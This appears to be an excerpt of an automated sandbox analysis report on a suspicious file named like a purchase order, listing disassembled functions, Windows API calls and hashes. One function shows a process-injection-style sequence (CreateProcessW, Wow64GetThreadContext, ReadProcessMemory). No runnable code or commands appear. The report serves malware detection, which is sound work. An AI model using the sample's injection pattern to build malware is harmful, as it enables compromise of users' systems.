                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: IconNotifyShell_
                          • String ID:
                          • API String ID: 1144537725-0
                          • Opcode ID: 31306a3cd81295234f8153b6bec853207a40fae9631feb64df164b3fbc7a3042
                          • Instruction ID: e36ab1e32b93f662c72ec6595b248db070f23ea7e183667552a2ed313310b6dc
                          • Opcode Fuzzy Hash: 31306a3cd81295234f8153b6bec853207a40fae9631feb64df164b3fbc7a3042
                          • Instruction Fuzzy Hash: D631C171A053019FE320DF34D884797BBE8FB49318F00096EF99983280E771AA44EB92
                          Function 00F05745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00F0949C,?,00008000), ref: 00F05773
                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00F0949C,?,00008000), ref: 00F44052
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 838cfb3d3e7f4eba29e38012917e3e6ce1c0984af1fa87e335a6d148b8f57884
                          • Instruction ID: 0527afb0a9e57c999d3e876ffd6bb2b44063136b1ae4961586b3e812436db584
                          • Opcode Fuzzy Hash: 838cfb3d3e7f4eba29e38012917e3e6ce1c0984af1fa87e335a6d148b8f57884
                          • Instruction Fuzzy Hash: 69014031545229B6E7304A2ADC0EF977F98EF02BB0F148211BE9C6A1E0CBB45854FB94
                          Function 00F06E14 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00F09879,?,?,?), ref: 00F06E33
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00F09879,?,?,?), ref: 00F06E69
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide
                          • String ID:
                          • API String ID: 626452242-0
                          • Opcode ID: 05df00a101c76fb60245493968c25940e04e62ed4017ef75847f68d4da106fc6
                          • Instruction ID: 6171ddb676ff430b29c4a18ea2feaca89259d93c03fdf51737eefb4e485d7c74
                          • Opcode Fuzzy Hash: 05df00a101c76fb60245493968c25940e04e62ed4017ef75847f68d4da106fc6
                          • Instruction Fuzzy Hash: D701DF713042047FEB186BA9DC0BF7F7AADDB85710F14003EF106DA1E1E9A0AC00A678
                          Function 00F0B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                          Download Yara Rule
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 00F0BB4E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Init_thread_footer
                          • String ID:
                          • API String ID: 1385522511-0
                          • Opcode ID: 63c4f6233ab832e912bcbc02fb957a49d15a7391c5c2554ee78229994df7f36d
                          • Instruction ID: 3fb5f5d56e7a1cef965dc0a3c8edf3ffc428251902ffc557e715a51cd8c623f1
                          • Opcode Fuzzy Hash: 63c4f6233ab832e912bcbc02fb957a49d15a7391c5c2554ee78229994df7f36d
                          • Instruction Fuzzy Hash: 7D32A071E002099FDB24CF54C894BBAB7B6EF44310F188059EE15AB291DB78ED45FB91
                          Function 00EB129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 00EB1A5B
                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EB1AF1
                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EB1B13
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657349418.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_eb0000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                          • String ID:
                          • API String ID: 2438371351-0
                          • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                          • Instruction ID: dfbc79f2dddc5e87904739ef0c8ad9d646e86e712537f935dc41870f8e3f6a84
                          • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                          • Instruction Fuzzy Hash: 7612CE24E14658C6EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A4F81CF5A
                          Function 00F04ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F04E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F04EDD,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04E9C
                            • Part of subcall function 00F04E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F04EAE
                            • Part of subcall function 00F04E90: FreeLibrary.KERNEL32(00000000,?,?,00F04EDD,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04EC0
                          • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04EFD
                            • Part of subcall function 00F04E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F43CDE,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04E62
                            • Part of subcall function 00F04E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F04E74
                            • Part of subcall function 00F04E59: FreeLibrary.KERNEL32(00000000,?,?,00F43CDE,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04E87
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Library$Load$AddressFreeProc
                          • String ID:
                          • API String ID: 2632591731-0
                          • Opcode ID: 8bc6ca053644bc9bf93a766866286b901c16179e62cf30dd08d171cd726ee4a8
                          • Instruction ID: 7c7d1ec17a21031c82c0c843eb3634cc5eef29a8416f7eb1a731fe6c57cf448b
                          • Opcode Fuzzy Hash: 8bc6ca053644bc9bf93a766866286b901c16179e62cf30dd08d171cd726ee4a8
                          • Instruction Fuzzy Hash: 8611E772610206AADF14BF60DD12FAD77A59F40B12F10842EF652AB1C1DEB8AA05BB50
                          Function 00F38402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: __wsopen_s
                          • String ID:
                          • API String ID: 3347428461-0
                          • Opcode ID: 1e18a2b9edc48c0cdeb670b746ea615b9130aca2007611f250e01b80b1e78e43
                          • Instruction ID: b8e9f3207c1aa4f0996f117fb073d4856b53b7ba75fd4134319f4bc036589f0f
                          • Opcode Fuzzy Hash: 1e18a2b9edc48c0cdeb670b746ea615b9130aca2007611f250e01b80b1e78e43
                          • Instruction Fuzzy Hash: 8211187590420AAFCF15DF58E941ADA7BF5EF48314F104059FC08AB312DB35DA12DBA5
                          Function 00F09A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                          Download Yara Rule
                          APIs
                          • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00F0543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00F09A9C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 9397a959f7605656da2533850a785e79be8773e245eb3fd77cc3cb636bf58846
                          • Instruction ID: adbd6edc04b325e22b95a9fa6f5a03d6a7200481f1b64ad0beee761498ff0110
                          • Opcode Fuzzy Hash: 9397a959f7605656da2533850a785e79be8773e245eb3fd77cc3cb636bf58846
                          • Instruction Fuzzy Hash: B4114C312087059FD720CF05C880B66B7F9EF44764F10C42EE9AB87692D7B4A945EB60
                          Function 00F35000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F34C7D: RtlAllocateHeap.NTDLL(00000008,00F01129,00000000,?,00F32E29,00000001,00000364,?,?,?,00F2F2DE,00F33863,00FD1444,?,00F1FDF5,?), ref: 00F34CBE
                          • _free.LIBCMT ref: 00F3506C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                          • Instruction ID: 0862d9cac7b5396ec9cc33d8a615e7b581675e2675f68ad7b4d4a233e24defe7
                          • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                          • Instruction Fuzzy Hash: 9E0126B26047056BE325CF69DC81A5AFBE8FBC9370F25051DE18483280EA31A805C6B4
                          Function 00F2E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                          • Instruction ID: 46453740846e5b9efd0ed6eec93ead29d81b24071b1296fc5e09f1ffb0be9c88
                          • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                          • Instruction Fuzzy Hash: 2DF02832921A3497C7313A69FC15B5A3B9C9F52371F200725F420932D2DB7CE802BAA5
                          Function 00F34C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,00F01129,00000000,?,00F32E29,00000001,00000364,?,?,?,00F2F2DE,00F33863,00FD1444,?,00F1FDF5,?), ref: 00F34CBE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 672514e515e81ed74d55b7adbed2407530e24129df2439c9c1814a2a55f50a2c
                          • Instruction ID: 1b3ebf4a3574422e746c252c104ab97f2589c9e3fa760cbe435c4db3c5174c22
                          • Opcode Fuzzy Hash: 672514e515e81ed74d55b7adbed2407530e24129df2439c9c1814a2a55f50a2c
                          • Instruction Fuzzy Hash: C8F0B432A02234A6DB215F62AC05B5A3788BF417F0F155122BC15AA191CA70FC0176F0
                          Function 00F33820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,00FD1444,?,00F1FDF5,?,?,00F0A976,00000010,00FD1440,00F013FC,?,00F013C6,?,00F01129), ref: 00F33852
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: fb3370c1c331eed00c780ced1416ed6d26c373c231bc889d404c77872f779d77
                          • Instruction ID: f8f204eedbe8758cce93c3435b677d70bd5632e25cdf69e7d86a49887a7507a4
                          • Opcode Fuzzy Hash: fb3370c1c331eed00c780ced1416ed6d26c373c231bc889d404c77872f779d77
                          • Instruction Fuzzy Hash: 2DE0E533901234A6E6216BB7AC00B9A3749AF427B0F060021BC04964A1CB60ED01B1E4
                          Function 00F04F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(?,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04F6D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 64873064efdc25546d24b542866bc0416ac09632d0091d771597516fa98fe036
                          • Instruction ID: 391d9daeb7376a7269e98a7ef303251c94b59bf5325fbbd2afb7a9354f95bdcc
                          • Opcode Fuzzy Hash: 64873064efdc25546d24b542866bc0416ac09632d0091d771597516fa98fe036
                          • Instruction Fuzzy Hash: F2F030B1505752CFDB349F64E490922BBE4EF1432A320897EE3EA83551C731A884FF50
                          Function 00F02DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F02DC4
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LongNamePath_wcslen
                          • String ID:
                          • API String ID: 541455249-0
                          • Opcode ID: 9e2baa3613a4332f9d03452271933e968c9bb0a39dfe3ce50ec681c76c0043dd
                          • Instruction ID: ae9ecc4672b2833e4bb667d382baab55c613cb11d391f3f87a334f7a00a65c6c
                          • Opcode Fuzzy Hash: 9e2baa3613a4332f9d03452271933e968c9bb0a39dfe3ce50ec681c76c0043dd
                          • Instruction Fuzzy Hash: 9EE0CDB26001245BCB10D7589C05FDA77DDDFC8790F050071FD09D7249D964AD849590
                          Function 00F72693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID:
                          • API String ID: 2638373210-0
                          • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                          • Instruction ID: dee9a52243e39354053310b287ebb7671c772e06b88fe2b90211bc791fc5c863
                          • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                          • Instruction Fuzzy Hash: 0BE04FB0609B005FDF3D5A28AC51BF677E89F49310F10486FF69F82252E57278459A4E
                          Function 00F02B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F03837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F03908
                            • Part of subcall function 00F0D730: GetInputState.USER32 ref: 00F0D807
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F02B6B
                            • Part of subcall function 00F030F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F0314E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: IconNotifyShell_$CurrentDirectoryInputState
                          • String ID:
                          • API String ID: 3667716007-0
                          • Opcode ID: d6b07a427d7bac02985ab0e111c0272ac9bf8379563a45f33656a2d961fbaecf
                          • Instruction ID: 1f9028282284aca1b8e2c6629e89cf50f77273bc4a049367e093846727db847e
                          • Opcode Fuzzy Hash: d6b07a427d7bac02985ab0e111c0272ac9bf8379563a45f33656a2d961fbaecf
                          • Instruction Fuzzy Hash: 5AE0262230420817CA04BB709C1257DB38E9BD2311F40053FF142432E3CE2845457251
                          Function 00F4039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(00000000,00000000,?,00F40704,?,?,00000000,?,00F40704,00000000,0000000C), ref: 00F403B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: d6e0d1df67a0f0d29fd4fe84a08ef1f95bef8b5a7321c940fb350079a9ff4ed2
                          • Instruction ID: cfa66de11697a48cf119d74e430176aa7f7224a3605cf660946f2673fa43dc4f
                          • Opcode Fuzzy Hash: d6e0d1df67a0f0d29fd4fe84a08ef1f95bef8b5a7321c940fb350079a9ff4ed2
                          • Instruction Fuzzy Hash: 9FD06C3204010DBBDF028F84DD06EDA3BAAFB48714F014000BE1856020C732E861AB94
                          Function 00F01CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
                          • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00F01CBC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: InfoParametersSystem
                          • String ID:
                          • API String ID: 3098949447-0
                          • Opcode ID: 3e83df5e947cd365a77f18197b2343d8f6924ee8334416e1360a6f22cae14ce4
                          • Instruction ID: 87c4b0c119e1e5ba273ee0de9b9a297019f10c677bf0d75a3df9c5c6ce53be8b
                          • Opcode Fuzzy Hash: 3e83df5e947cd365a77f18197b2343d8f6924ee8334416e1360a6f22cae14ce4
                          • Instruction Fuzzy Hash: 91C0923628130CAFF2158BA4BC4AF107766B358B00F488003F609A95E3C7A22820FA90
                          Function 00F5D8DD Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathW.KERNELBASE(00000104,?), ref: 00F5D8E9
